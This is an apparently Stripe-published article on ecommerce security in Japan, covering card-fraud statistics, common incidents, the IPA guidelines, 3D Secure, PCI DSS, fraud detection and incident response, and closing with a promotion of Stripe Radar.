With the increasing popularity of online shopping and digital payments, ecommerce sites have become an indispensable part of everyday life in Japan. However, security risks—such as credit card fraud, personal information leaks, and cyberattacks—increase year by year. Many ecommerce businesses struggle to figure out how to handle these issues because of limited resources.

In this article, we explain basic security measures for ecommerce businesses in Japan and some methods for responding to fraudulent payments and information leaks.

What’s in this article?

• Why are security measures necessary in ecommerce?
  
• Common security incidents affecting ecommerce businesses
  
• Security guidelines for ecommerce sites
  
• Basic security measures for ecommerce sites
  
• How to respond to a security threat in ecommerce
  
• How can ecommerce businesses in Japan improve security?
  
• How Stripe Radar can help
  

Why are security measures necessary in ecommerce?

As the ecommerce market expands, methods for fraud and cyberattacks become more sophisticated. Damage caused by credit card information attacks become increasingly serious every year. Therefore, security measures must be strengthened.

Measures to prevent damage from credit card fraud

According to the Japan Consumer Credit Association (JCA), credit card fraud losses in 2024 reached a record high of ¥‎55.5 billion. This amount grew by more than double in just five years. This shows that fraud is increasing in proportion to the growth of the ecommerce market.

The majority of these losses (i.e., over 90%) were caused by credit card number theft on ecommerce sites. This theft is carried out through phishing emails, fake shopping sites, and hacking into ecommerce operating systems. Without basic countermeasures, a reduction in these losses is unlikely. The Credit Card Security Guidelines also require ecommerce businesses to implement specific measures.

Protecting customers’ personal data

Ecommerce sites handle a lot of credit card information. In addition, they handle personal information, such as names, addresses, telephone numbers, and email addresses. When personal information leaks, the damage is not limited to a single person. Typically, a large amount of customer data leaks, resulting in major financial damage and a hit to the business’s reputation.

Cardholders who become victims of fraud due to number theft could receive unexpected charges and could also feel anxious and dissatisfied about the information leak. This could cause them to lose trust in the ecommerce site. To restore trust, the business should spend time and resources on customer support and investigations. However, data leaks can damage the credibility and profitability of the business as a whole.

The ongoing risk of cyberattacks

Ecommerce sites are attractive targets for cyberattacks. This is because they can be accessed any time and include a large amount of transaction data. A report from the Ministry of Economy, Trade and Industry (METI) highlights that unauthorized access, phishing, and payment system hacks are on the rise. In recent years, attack methods have become increasingly sophisticated. They have expanded to include automated fraud methods known as “credit master attacks” and phishing scams using artificial intelligence (AI).

Common security incidents affecting ecommerce businesses

Many different types of security incidents can occur on ecommerce sites. Here are some common examples and their risks:

System shutdowns

This happens when the ecommerce site shuts down and becomes unavailable due to server or system failure. When a site shuts down, it can lose sales and customer trust. In addition, recovery efforts can lead to labor and financial costs.

The Information-technology Promotion Agency (IPA) provides Security Guidelines for Building and Operating Ecommerce Sites that recommend preparing for these situations by regularly backing up data, introducing redundancies, implementing access control, and utilizing logs.

According to a survey conducted by the IPA and the Personal Information Protection Commission (PPC), the average loss in sales due to the shutdown of an ecommerce site is estimated to be ¥57 million. The average cost of responding to this kind of incident is estimated to be ¥240 million.

Website alteration

If viruses or malware infiltrate administrator terminals or servers, they can cause damage to systems or data. An ecommerce business should install antivirus software, regularly update operating systems and software, and establish a hacking detection system.

According to the National Police Agency (NPA), there have been multiple reports of a crime called “web skimming.” This involves illegal programs being embedded into legitimate ecommerce sites to acquire customers’ card information.

Unauthorized access

This occurs when a third party gains unauthorized access to administrative screens or databases to view, alter, or delete data. The security guidelines mentioned above include key countermeasures, such as multifactor authentication, vulnerability assessment, access control, and login anomaly detection.

Ecommerce sites built using open source software (OSS) could be at particular risk. According to the IPA, 97% of affected ecommerce sites were built in-house, with many using OSS systems. While OSS systems are convenient, their vulnerabilities are also easier to discover. For example, if patches are not applied promptly or correctly, an OSS system can easily become a target for unauthorized access.

Ransomware

This cyberattack involves fraudulent actors encrypting systems or data and demanding money in exchange for restoring them. Businesses can reduce the risk of this attack through regular backups, separate storage, restrictions of administrator privileges, and recovery training.

According to a report by the Japan Network Security Association (JNSA), ransomware attacks have caused financial losses of ¥10 million to several hundred million. This includes small and medium-sized enterprises, with some cases reporting losses exceeding ¥100 million.

Security guidelines for ecommerce sites

The Security Guidelines for Building and Operating Ecommerce Sites published by the IPA provide specific security guidelines for safely creating and operating ecommerce sites. They are mainly intended for small and medium-sized enterprises and independent vendors.

The main guidelines are:

• Prevent security incidents.
  
• Correct design and operations vulnerabilities.
  
• Provide support for nonspecialist staff.
  
• Clarify responsibilities among relevant parties for both in-house and outsourced systems.
  

The security guidelines are more than a technical manual. Instead, they unite practical work with decision-making by emphasizing the importance of security measures as management decisions. In addition, the guidelines provide examples of causes, effects, and risks of security incidents that have occurred or could occur.

In all cases of security incidents, the main cause is a lack of clarity regarding who is responsible and what needs to be protected. The guidelines divide security measures into three categories based on the parties involved in preventing incidents. They also clarify and explain the roles of each party.

Ecommerce site operators should:

• Decide on site creation and construction and operations policies
  
• Clarify outsourcing and vendor selection, contracts, and management
  
• Establish a customer information protection policy
  

Development and construction vendors should:

• Design and implement vulnerability-free systems
  
• Perform verification and testing
  
• Update and manage software
  

Operation and maintenance vendors should:

• Perform regular vulnerability support for servers and software
  
• Establish log management and monitoring systems
  
• Establish a response system in case of an accident
  

Basic security measures for ecommerce sites

For many businesses, it can seem complicated to update and strengthen security measures. However, it’s important to start with simple steps that can be done immediately, such as strengthening passwords and reviewing sharing settings. Then, businesses can gradually build robust security systems. Here are some specific measures ecommerce businesses should consider:

Integrate Three-Domain Secure (3D Secure) 2.0 for identity verification

3D Secure 2.0 is a system that enhances identity authentication for credit card payments. One-time passcodes and biometric authentication can prevent unauthorized payments that use impersonation tactics.

This system also offers an improved customer experience compared to conventional password methods, while balancing security and convenience. This has made it increasingly popular among credit card companies and payment service providers. Ecommerce sites that have not yet integrated 3D Secure are at risk of chargebacks and transaction refusals. Therefore, ecommerce businesses should consider adopting it early on.

Compliance with Payment Card Industry Data Security Standard (PCI DSS)

PCI DSS is an international security standard for businesses that handle credit card information. This standard provides detailed specifications, such as information encryption, access control, and log management. Strict compliance is required when handling card information in-house.

However, managing all of these requirements in-house can be a significant burden, so many businesses use payment agents that are PCI DSS–compliant to reduce this burden while still meeting the requirements.

Implement credit card fraud detection

Fraudulent transactions are not always obvious at first. Often, businesses discover them after the purchases have been completed. This makes it important to have a system that detects and responds to signs of fraudulent transactions in real time, especially before transactions are made or settled. Here are a few qualities that should flag transactions as suspicious:

• Access from areas with a history of fraud
  
• Consecutive card entries from the same Internet Protocol (IP) address
  
• Mismatched customer information and cardholder name
  
• Multiple high-value purchases in a short period of time
  

Using a system that automatically blocks or holds transactions for review when they are classified as risky can prevent damage before it occurs.

How to respond to a security threat in ecommerce

Implementing security measures can help reduce the occurrence of security incidents. However, the increase in the number of cases of fraud means most businesses are likely to experience a security breach of some sort. This can occur even if the business puts countermeasures into place. Here are a few ways to respond to specific security incidents:

Virus infection or ransomware

Stop using the infected computer or server, and disconnect it from the network. After that, report the incident to the affected business partners and customers, as well as any relevant government agencies. For example, in Japan, virus and ransomware infections must be reported to the IPA. Then, proceed with your investigation and restoration work. Backing up data regularly can minimize the damage from this kind of incident.

Data leaks

Data leaks include unauthorized access to networks, illegal activities committed by employees (i.e., internal misconduct), misdirected emails, and accidental publication on the web. If this happens, confirm the type and amount of data that has leaked, as well as the status of security measures such as encryption and access restrictions.

In the event of unauthorized access, immediately disconnect the device from the network and suspend services. This is important because there is a risk of personal information or confidential information being leaked. If credit card or account information is leaked, contact the credit card company and have the account(s) suspended.

In the case of internal misconduct, restrict access to internal systems and preserve evidence, such as personal computers. If emails have been sent to the wrong recipients, contact them and request that they delete the emails. If information has been mistakenly published on the company’s website, immediately delete it or restrict access so it cannot be viewed from outside the organization.

After taking these measures, be sure to report and notify the relevant parties as needed:

• If leaked information—such as account information—could be misused, alert the individuals and businesses affected to prevent secondary damage.
  
• If personal information leaks, report this to the PPC.
  
• If the cause of the information leak is criminal in nature—such as unauthorized access or internal misconduct—report the details to the police.
  
• If the cause of the information leak is a computer virus or unauthorized access, report the incident to the IPA reporting office.
  

Next, investigate the scope, cause, and damage of the leaked information. Then, proceed with recovery efforts to prevent recurrence.

System shutdown

If a system shutdown occurs, it can be difficult to immediately identify the cause. Potential causes include general equipment failure and security breaches, such as cyberattacks and software bugs. If the cause is unknown, the business should react as if it is a security issue.

If there are system malfunctions, failures, shutdowns, or imminent signs that one might occur, contact the system administrator or information security officer. Depending on the situation, the responsible party could switch over or shut down the servers as necessary.

After that, contact business partners and report the incident to the relevant government agencies. If there is a virus or unauthorized access, report it to the IPA reporting office. Investigate the cause of the incident and proceed with restoration and recurrence prevention.

How can ecommerce businesses in Japan improve security?

Ecommerce security measures are important for protecting day-to-day operations. No matter the size of the business, card fraud and data leaks are always a risk that businesses must work to combat.

In recent years, it has become easier to adopt and integrate a variety of measures—such as 3D Secure—to strengthen identity verification (i.e., Know Your Customer [KYC] procedures). Businesses can also follow industry standards—such as PCI DSS—and introduce fraud detection services. It’s important to remain vigilant and take proactive measures in advance. Just because a business hasn’t faced security problems doesn’t mean it should get complacent. Business owners should enhance security measures for their ecommerce sites to ensure the reliability, trustworthiness, and continuity of their ecommerce businesses.

How Stripe Radar can help

Stripe Radar uses AI models to detect and prevent fraud, trained on data from Stripe’s global network. It continuously updates these models based on the latest fraud trends, protecting your business as fraud evolves.

Stripe also offers Radar for Fraud Teams, which allows users to add custom rules addressing fraud scenarios specific to their businesses and access advanced fraud insights.

Radar can help your business:

• Prevent fraud losses: Stripe processes over $1 trillion in payments annually. This scale uniquely enables Radar to accurately detect and prevent fraud, saving you money.
  
• Increase revenue: Radar’s AI models are trained on actual dispute data, customer information, browsing data, and more. This enables Radar to identify risky transactions and reduce false positives, boosting your revenue.
  
• Save time: Radar is built into Stripe and requires zero lines of code to set up. You can also monitor your fraud performance, write rules, and more in a single platform, increasing efficiency.
  

Learn more about Stripe Radar, or get started today.